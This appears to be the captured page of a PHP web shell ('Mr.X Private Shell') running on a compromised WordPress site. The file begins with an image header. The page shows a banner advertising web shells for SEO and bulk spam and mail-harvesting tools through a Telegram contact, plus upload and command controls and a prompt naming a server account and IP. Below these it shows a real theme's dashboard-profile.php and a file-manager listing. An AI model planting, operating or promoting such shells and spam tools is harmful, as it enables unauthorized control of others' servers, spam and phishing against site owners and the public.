����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

airtcsob@216.73.216.143: ~ $
<?php
/**
 * Template Name: Dashboard User Profile
 */
/*-----------------------------------------------------------------------------------*/
// Social Logins
/*-----------------------------------------------------------------------------------*/
if( isset($_GET['verification_id']) && !empty($_GET['verification_id']) ){
    $args = array(
        'meta_query' => array(
            array(
                'key' => 'verification_id',
                'value' => $_GET['verification_id'],
                'compare' => '='
            )
        )
    );

    $verify_users = get_users($args);
    $verify_user_id = 0;
    $verify_user_email = '';
    if ($verify_users) {
        foreach ($verify_users as $user) {
            $verify_user_id = $user->ID;
            $verify_user_email = $user->user_email;
            update_user_meta($verify_user_id, 'is_email_verified', 1);
            update_user_meta($verify_user_id, 'verification_id', '');
        }
    }

    if($verify_user_id > 0){
        if(homey_option('user_login_after_activation', 0) > 0) {
            // log in automatically
            if (!is_user_logged_in() && $verify_user_email != '') {
                $user = get_user_by('email', $verify_user_email);

                add_filter('authenticate', 'for_reservation_nop_auto_login', 3, 10);
                for_reservation_nop_auto_login($user);
            }else{
                nocache_headers();
                header("Location: ". home_url('/?auth_message=your-profile-is-activated') );
                die();
            }
        }else{
            nocache_headers();
            header("Location: ". home_url('/?auth_message=your-profile-is-activated') );
            die();
        }

    }
}

if( ( isset($_GET['code']) && isset($_GET['state']) ) ){
    homey_facebook_login($_GET);

} else if( isset( $_GET['openid_mode']) && $_GET['openid_mode'] == 'id_res' ) {
    homey_openid_login($_GET);

} else if (isset($_GET['code'])){
    homey_google_oauth_login($_GET);

} else {
    if ( !is_user_logged_in() ) {
        wp_redirect(  home_url('/') );
    }
}


get_header();
global $current_user, $author_info;

wp_get_current_user();
$userID = $current_user->ID;
$user_email = $current_user->user_email;

$admin_email =  get_bloginfo('admin_email');
$author_info = homey_get_author_by_id('100', '100', 'img-circle', $userID);
$offsite_payment = homey_option('off-site-payment');
?>

    <section id="body-area">

        <div class="dashboard-page-title">
            <h1><?php echo esc_html__(the_title('', '', false), 'homey'); ?></h1>
        </div><!-- .dashboard-page-title -->

        <?php get_template_part('template-parts/dashboard/side-menu'); ?>

        <div class="user-dashboard-right dashboard-with-sidebar">
            <div class="dashboard-content-area">
                <div class="container-fluid">
                    <div class="row">
                        <div class="col-lg-12 col-md-12 col-sm-12">
                            <div class="dashboard-area">

                                <div id="profile_mandatory_message" class="alert alert-danger alert-dismissible" role="alert" style="display: none;">
                                    <button type="button" class="close" data-hide="alert" aria-label="Close">
                                        <span aria-hidden="true">×</span>
                                    </button>
                                    <?php echo esc_html__('To book please fill all mandatory fields, and upload the profile picture.', 'homey'); ?>
                                </div>
                                <div id="profile_message"></div>

                                <?php
                                if(isset($_GET['dpage']) && $_GET['dpage'] == 'password-reset') {
                                    get_template_part('template-parts/dashboard/profile/password');

                                } elseif(isset($_GET['dpage']) && $_GET['dpage'] == 'verification') {
                                    get_template_part('template-parts/dashboard/profile/verification');

                                } elseif(isset($_GET['dpage']) && $_GET['dpage'] == 'payment-method') {
                                    get_template_part('template-parts/dashboard/profile/payment-method');

                                } else {

                                    get_template_part('template-parts/dashboard/profile/progress');
                                    get_template_part('template-parts/dashboard/profile/photo');
                                    get_template_part('template-parts/dashboard/profile/information');
                                    get_template_part('template-parts/dashboard/profile/address');
                                    get_template_part('template-parts/dashboard/profile/contact');

                                    if(!homey_is_renter()) {
                                        get_template_part('template-parts/dashboard/profile/social');
                                    }
                                    if(!homey_is_admin()) {
                                        get_template_part('template-parts/dashboard/profile/delete');
                                    }

                                }

                                wp_nonce_field( 'homey_profile_nonce', 'homey_profile_security' );
                                ?>

                            </div><!-- .dashboard-area -->
                        </div><!-- col-lg-12 col-md-12 col-sm-12 -->
                    </div>
                </div><!-- .container-fluid -->
            </div><!-- .dashboard-content-area -->

            <aside class="dashboard-sidebar">
                <?php
                if(isset($_GET['dpage']) && $_GET['dpage'] == 'payment-method' && $offsite_payment == 1) {
                    get_template_part('template-parts/dashboard/profile/upfront');
                } else {
                    get_template_part('template-parts/dashboard/profile/status');
                }
                ?>
            </aside><!-- .dashboard-sidebar -->

        </div><!-- .user-dashboard-right -->

    </section><!-- #body-area -->


<?php get_footer();?>

Filemanager

Name Type Size Permission Actions
dashboard-exp-payment.php File 16.95 KB 0644
dashboard-experience-submission.php File 8.29 KB 0644
dashboard-experience-submitted.php File 5.79 KB 0644
dashboard-experiences.php File 11.37 KB 0644
dashboard-favorites.php File 8.54 KB 0644
dashboard-invoices.php File 7.31 KB 0644
dashboard-listing-submitted.php File 6.84 KB 0644
dashboard-listings.php File 11.73 KB 0644
dashboard-membership-host.php File 11.66 KB 0644
dashboard-messages.php File 7.17 KB 0644
dashboard-payment.php File 16.84 KB 0644
dashboard-profile.php File 6.08 KB 0644
dashboard-reservations-experiences.php File 6.85 KB 0644
dashboard-reservations.php File 9.61 KB 0644
dashboard-reservations2-experiences.php File 1.16 KB 0644
dashboard-reservations2.php File 2.29 KB 0644
dashboard-submission.php File 7.79 KB 0644
dashboard-wallet.php File 4.39 KB 0644
dashboard.php File 2.75 KB 0644
template-compare-exp.php File 6.68 KB 0644
template-compare.php File 10.05 KB 0644
template-exp-search.php File 531 B 0644
template-experience-card.php File 6.54 KB 0644
template-experience-grid.php File 6.33 KB 0644
template-experience-list.php File 6.22 KB 0644
template-experience-sticky-map.php File 6.37 KB 0644
template-half-map-exp.php File 2.19 KB 0644
template-half-map.php File 2.17 KB 0644
template-homepage.php File 618 B 0644
template-ical-exp.php File 1.72 KB 0644
template-ical.php File 1.77 KB 0644
template-instance-booking.php File 1.06 KB 0644
template-instance-exp-booking.php File 831 B 0644
template-listing-all-reviews.php File 4.13 KB 0644
template-listing-as-page.php File 298 B 0644
template-listing-card.php File 6.7 KB 0644
template-listing-grid-v2.php File 7.03 KB 0644
template-listing-grid.php File 6.74 KB 0644
template-listing-list-v2.php File 6.74 KB 0644
template-listing-list.php File 6.34 KB 0644
template-listing-sticky-map.php File 6.58 KB 0644
template-membership-webhook.php File 37.93 KB 0644
template-page.php File 2.61 KB 0644
template-search.php File 495 B 0644
template-splash-exp.php File 3.74 KB 0644
template-splash.php File 3.35 KB 0644
template-stripe-charge-exp.php File 7.4 KB 0644
template-stripe-charge.php File 11.83 KB 0644
template-subscriptions-payment-complete.php File 23 KB 0644
template-subscriptions-stripe-charge.php File 3.98 KB 0644
template-verification.php File 2.76 KB 0644
template-woocommerce.php File 2.02 KB 0644
testing.php File 87 B 0644